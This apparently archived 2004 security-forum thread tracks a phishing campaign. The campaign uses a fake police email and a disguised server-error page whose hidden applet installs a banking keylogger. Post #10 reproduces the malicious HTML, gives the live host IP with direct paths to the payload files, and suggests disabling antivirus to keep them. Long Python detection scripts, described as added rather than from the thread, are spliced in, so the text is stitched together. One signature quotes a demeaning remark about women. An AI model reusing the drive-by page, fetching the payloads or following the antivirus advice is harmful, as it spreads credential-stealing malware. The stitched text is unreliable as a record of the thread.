
Thread: owned as we speak

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785

    owned as we speak

    how current can you get? thought you might like to take a look at a crime in progress

    220-Connecting To MegaCrew's l337 FTP Server....
    220-.:::::::::::::::::::::::
    220-.::: ____________________________________________________
    220-.:::| ╕,°ñ░`░ñ°,╕╕╕╕╕╕╕╕╕╕╕
    220-.:::| .Welcome to
    220-.:::| MegaCrew
    220-.:::| ``````````░ñ°,╕╕,°ñ░`
    220-.:::|____________________________________________________
    220-.:::::::::::::::::::::::
    220-.:::|____________________________________________________
    220-.:::| USER INFO:
    220-.:::|
    220-.:::| ñ Your IP Address : xx.xxx.xx.xxx
    220-.:::| ñ Current Time : 11:55:34
    220-.:::| ñ Current Date : Monday 16 February, 2004
    220-.:::|____________________________________________________
    220-.:::::::::::::::::::::::

    This is from the server used to download a keylogger that looks only for info on bank accounts, then emails it to an '.ru' mail server. The originating address of the email is in China, which is no doubt owned by someone from somewhere else.


    victims are lured to a website through an email:

    Hello...

    It has come to my attention that you are being under the police investigation.
    Is that true? Have you really commited such crimes?

    Please read the following article located at:

    http://federalpolice.com:article872[...#39;1075686747


    where they see what appears to be a server error page, which is actually a web page made to download an executable (through the mime type vuln) named javautil.zip and execute it.

    the web server that is being used is a completely owned server. (it's really disgraceful)

    the hacked server is still up '1075686747' for anyone wanting to get a first hand look at it but the police have been notified and are probably watching it.

    more info:

    http://spamwatch.codefish.net.au/mod...article&sid=55
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  2. #2
    Senior Member deftones12's Avatar
    Join Date
    Jan 2003
    Location
    cali forn i a
    Posts
    333
    good work tedbob...how long have u been trackin this? how'd u find all this out? do they set up a backdoor also along with a keylogger?

  3. #3
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Hmm. I saw an advisory about this one this morning. The advisory is from a paid security firm so I cannot post the info here.

    Good find!

    BE CAREFUL if you downloaded the javautil.zip (for educational purposes): it's NOT a zipfile but an executable.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  4. #4
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323
    This one started over the weekend. The first bits came out late Saturday and I've suggested to the original poster to get Antiphishing.com to look into posting it as well.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head

  5. #5
    Junior Member
    Join Date
    Nov 2003
    Posts
    6
    I just wanted to know how the javautil.zip can be made to auto-execute on one's machine; is it because the file is really called javautil.exe? Maybe this is a stupid question, but maybe you could tell me what the mime type vuln looks like, to be aware when opening different webpages.
    Don't you have your internet settings set so that there has to be authorization before a download is made onto your computer?
    Imagination is greater than intelligence when referring to intricate things; the reason why is that if you can't imagine how something works, how do you expect to understand it and therefore to know anything about it.

    Imagination, Precious

  6. #6
    AO Part Timer
    Join Date
    Feb 2003
    Posts
    331
    the web server that is being used is a completly owned server. (its really disgraceful)
    *ROTFLMAO*

    Holy crap! When you said completely you weren't kidding. Anybody else see that mess?
    Not only does it look like 3 separate doors, it appears as if they didn't even need them in the first place. No pun intended.

    This is a perfect example of why you need to lock down your machines. Not just patched either. Learn how some of this stuff actually works; if you don't need it, disable it. Granted, some of this stuff could have been enabled by the attacker.

    Good find Tedob1 thanks for the humor.

    /edit corrected name OOPS!

  7. #7
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    no prob. I've been called much, much worse.

    to add insult to injury the perps are using netbus.


    epolgar:
    http://secunia.com/advisories/10736/

  8. #8
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    an added note from full-disclosure:

    "one major issue left out by that link is the fact that it is not just a
    keylogger, it also rapes the Protected Storage Subsystem, as is obvious
    by the fact that it imports pstorec.dll, and calls PStoreCreateInstance.
    Another interesting thing to note is that it can be uninstalled by
    finding the EXE and running it with the "Uninstall" flag... "
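Two of the points raised in this thread can be checked mechanically: the "zip" that is really an executable (post #3) and the pstorec.dll / PStoreCreateInstance references that the full-disclosure note above points out. The following Python triage helper is an added example, not code from the thread or from anyone posting in it. It classifies a downloaded blob by its magic bytes rather than its filename, and for PE files does a cheap string scan for the Protected Storage indicators. The "PE" it builds for the demonstration is a constructed stand-in (an MZ stub, a PE signature and the two indicator strings), not the real javautil.zip.

```python
import io
import struct
import zipfile

# Indicator strings the full-disclosure note associates with the sample's use of
# the Protected Storage subsystem (pstorec.dll / PStoreCreateInstance).
PSTORE_INDICATORS = [b"pstorec.dll", b"PStoreCreateInstance"]


def is_pe(data: bytes) -> bool:
    """True if data has an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def identify(data: bytes) -> str:
    """Classify by content only; the filename is deliberately ignored."""
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if is_pe(data):
        return "pe"
    if data.startswith(b"MZ"):
        return "mz-stub"  # DOS header without a valid PE signature
    return "unknown"


def pstore_indicators(data: bytes) -> list:
    """Cheap string triage: which Protected Storage indicators appear in the blob?"""
    return [s.decode() for s in PSTORE_INDICATORS if s in data]


def triage(filename: str, data: bytes) -> dict:
    """Compare what the name claims with what the bytes are, and flag indicators."""
    kind = identify(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    findings = []
    if ext == "zip" and kind != "zip":
        findings.append(f"extension .zip but content is {kind}")
    if kind == "pe":
        hits = pstore_indicators(data)
        if hits:
            findings.append("references Protected Storage API: " + ", ".join(hits))
    return {"kind": kind, "findings": findings}


def build_sample_pe() -> bytes:
    """Constructed stand-in for a PE: MZ stub, e_lfanew=0x40, PE signature, indicator strings."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)
    body = b"PE\x00\x00" + b"\x00" * 20 + b"pstorec.dll\x00PStoreCreateInstance\x00"
    return bytes(header + body)


def build_sample_zip() -> bytes:
    """A genuine (constructed) zip archive, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "harmless")
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in (("javautil.zip", build_sample_pe()), ("real.zip", build_sample_zip())):
        print(name, triage(name, blob))
```

The string scan is only a first-pass hint: a packed or encrypted sample hides its import names, so the absence of a hit proves nothing, while a hit on a file that calls itself a zip is enough to pull it out of any automatic handling.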

  9. #9
    HeadShot Master N1nja Cybr1d's Avatar
    Join Date
    Jul 2003
    Location
    Boston, MA
    Posts
    1,840
    I wonder if my firewall would catch it... is it safe to click on that link without having it execute on my PC? I'm using win2k/XP dual boot. Connected through 2k right now. I would like to tear the program they're using apart to see what I learn from it. If you have the file, would you be able to post it as an attachment for me please.

  10. #10
    AO Part Timer
    Join Date
    Feb 2003
    Posts
    331
    64.29.173.91

    After you connect it serves you the files automatically via an applet

    here is the html

    <HTML><BODY bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
    <h2>SERVER ERROR 550</h2>
    <APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET></BODY></HTML>


    if you connect

    64.29.173.91/blackbox.class
    64.29.173.91/javautil.zip

    you can save them that way

    hope this helps

    Norton will pick up blackbox.class so if you wanna keep it kill norton or any other AV for a moment.

    Use at your own discretion

    Your heart was talking, not your mind.
    -Tiger Shark
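The page quoted in the post above is a good specimen of the pattern a web filter or mail gateway can look for: a body that reads as a server error, a 1x1 applet, and an ARCHIVE attribute pointing at something that is not a .jar. The scanner below is an added Python example, not code from the thread; it uses only the standard library's html.parser. SAMPLE_HTML is a copy of the markup quoted above and BENIGN_HTML is a constructed normal applet page for comparison; nothing is fetched from the network.

```python
from html.parser import HTMLParser

# Copy of the disguised error page quoted in the post above (constructed here; not fetched).
SAMPLE_HTML = """<HTML><BODY bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
<h2>SERVER ERROR 550</h2>
<APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET></BODY></HTML>"""

# Constructed benign page: normally sized applet, proper .jar archive.
BENIGN_HTML = """<html><body><h2>Chess</h2>
<applet code="Board.class" archive="board.jar" width=400 height=300></applet></body></html>"""


class ActiveContentScanner(HTMLParser):
    """Collects applet/object/embed tags plus the page's visible text."""

    def __init__(self):
        super().__init__()
        self.active = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so uppercase markup matches too.
        if tag in ("applet", "object", "embed"):
            self.active.append(dict(attrs))

    def handle_data(self, data):
        self.text.append(data)


def _tiny(value) -> bool:
    """True for a dimension of one pixel or less (the classic hidden applet)."""
    if value is None:
        return False
    try:
        return int(value) <= 1
    except ValueError:
        return False


def scan_html(html: str) -> list:
    """Return one finding per active-content tag, each with the reasons it looks suspicious."""
    p = ActiveContentScanner()
    p.feed(html)
    p.close()
    visible = " ".join(p.text).lower()
    findings = []
    for a in p.active:
        reasons = []
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("invisible applet (width/height <= 1)")
        archive = a.get("archive", "")
        if archive and not archive.lower().endswith(".jar"):
            reasons.append(f"archive is not a .jar: {archive}")
        if "server error" in visible:
            reasons.append("page poses as a server error while loading active content")
        findings.append({"code": a.get("code"), "archive": archive, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for label, page in (("quoted page", SAMPLE_HTML), ("benign page", BENIGN_HTML)):
        print(label, scan_html(page))
```

Each heuristic on its own is weak (plenty of legitimate pages have small applets), which is why the scanner reports reasons rather than a verdict; a page that trips all three is worth blocking or at least logging with the archive name so the download can be pulled and triaged.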
